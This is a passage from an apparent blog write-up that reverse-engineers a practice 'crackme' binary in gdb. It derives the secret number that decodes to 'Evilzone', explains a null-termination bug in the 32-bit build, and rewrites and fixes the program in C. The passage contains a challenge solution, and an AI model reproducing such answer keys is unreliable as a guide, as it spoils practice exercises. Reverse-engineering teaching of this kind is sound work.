$eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048724 to 0x8048738:/span/span span class="code-line"span class="go"=gt; 0x08048724 lt;main+216gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"span class="go" 0x08048729 lt;main+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;main+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;main+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;main+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;main+233gt;: call 0x8048500 lt;atoi@pltgt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080484d0 in strlen@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048729 0xbffffc5d 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;EYquot;/span/span span class="code-line"/code/pre/div /td/tr/table pO..K.., that's unusual, continuing:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 5, 0x08048735 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048735 to 0x8048749:/span/span span class="code-line"span class="go"=gt; 0x08048735 lt;main+233gt;: call 0x8048500 lt;atoi@pltgt;/span/span span class="code-line"span class="go" 0x0804873a lt;main+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;main+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;main+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;main+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;main+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048500 in atoi@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x0804873a 0xbffffc45 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc45/span/span span class="code-line"span class="go"0xbffffc45: quot;678\002quot;/span/span span class="code-line"/code/pre/div /td/tr/table pHopefully you can see what I'm doing by now, so it looks like there is a loop which is going through my input number 3 by 3, starting from the 3rd character, and converting them into ascii characters. Lets remove the breakpoint at the calls to codeatoi/code and codestrlen/code and see what that codestrcmp/code is doing:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 4/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 5/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 6, 0x08048770 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048770 to 0x8048784:/span/span span class="code-line"span class="go"=gt; 0x08048770 lt;main+292gt;: call 0x8048460 lt;strcmp@pltgt;/span/span span class="code-line"span class="go" 0x08048775 lt;main+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;main+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;main+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;main+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;main+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048460 in strcmp@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048775 0xbffffc5d 0x08048886/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;EY\246quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x08048886/span/span span class="code-line"span class="go"0x8048886: quot;Evilzonequot;/span/span span class="code-line"/code/pre/div /td/tr/table pAhha! So it looks like its comparing the converted string with the string found earlier with the codestrings/code command (codeEvilzone/code). 'E' is equal to 069 on the ascii table (see a href="http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7"man ascii/a for more information), this explains why the first 2 numbers had to be 69. Using the ascii table to work out the rest of the number is easy, it turns out to be code69118105108122111110101/code./p pIt doesn't work on the 32 bit version as explained earlier so to test that it is the right number use the 64 bit version:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev64:~/crackmes# /span./crackme1_64bit /span span class="code-line"span class="go"Please enter the secret number: 69118105108122111110101/span/span span class="code-line"span class="go"The Password translates into Evilzone, Good job./span/span span class="code-line"/code/pre/div /td/tr/table h2Investigating The Bug/h2 pGreat! Challenge cracked. Now lets run this through codegdb/code and you can see why the 32 bit version of this challenge is broken:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 69118105108122111110101/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 6, 0x08048770 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048770 to 0x8048784:/span/span span class="code-line"span class="go"=gt; 0x08048770 lt;main+292gt;: call 0x8048460 lt;strcmp@pltgt;/span/span span class="code-line"span class="go" 0x08048775 lt;main+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;main+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;main+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;main+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;main+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048460 in strcmp@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048775 0xbffffc5d 0x08048886/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Evilzone69118105108122111110101quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x08048886/span/span span class="code-line"span class="go"0x8048886: quot;Evilzonequot;/span/span span class="code-line"/code/pre/div /td/tr/table pOk so this will still fail but why? Look at where our original number is stored:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $esp+0x35/span/span span class="code-line"span class="go"0xbffffc65: quot;69118105108122111110101quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Evilzone69118105108122111110101quot;/span/span span class="code-line"/code/pre/div /td/tr/table p0xbffffc65 (Where our original number is stored in memory), 0xbffffc5d (Where the string converted from the original number is stored in memory), 0xbffffc65 - 0xbffffc5d = 8, so these are 8 bytes apart, the string 'Evilzone' is 8 bytes, therefore once our string is calculated, its no longer null terminated./p h2Rewriting The App/h2 pUsing the knowledge we have gained about this application, we should now be able to build it ourselves, the following is my implementation of the application written in C, please remember that the real source code may vary:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define ANSWER quot;Evilzonequot;/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"good/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Good job.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"8/spanspan class="p"],/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"24/spanspan class="p"],/spanspan class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"4/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%23squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;E#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"3/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"2/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"converted/spanspan class="p")/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"8/spanspan class="w" /spanspan class="o"amp;amp;/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"input/spanspan class="p");/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"3/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"2/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"check/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="n"ANSWER/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;The Password translates into %s, quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"good/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis application has the same issue as the original application, it doesn't work on 32 bit systems./p h3Fixing The App/h3 pIn my application there were 2 main reasons that it wasn't working on my 32 bit machine, the first was because I wasn't zero'ing out the character array that I use to store the converted string in (codeconverted/code), because of this the value returned by codestrlen/code in the for loop, on line 33, was never less than 8 and the codefor/code loop would never be executed. Secondly the string again was not being null terminated, here is the fixed application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define ANSWER quot;Evilzonequot;/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"good/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Good job.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"24/spanspan class="p"],/spanspan class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"4/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%23squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;E#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"3/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"2/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"converted/spanspan class="p")/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"8/spanspan class="w" /spanspan class="o"amp;amp;/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"input/spanspan class="p");/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"3/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"2/spanspan 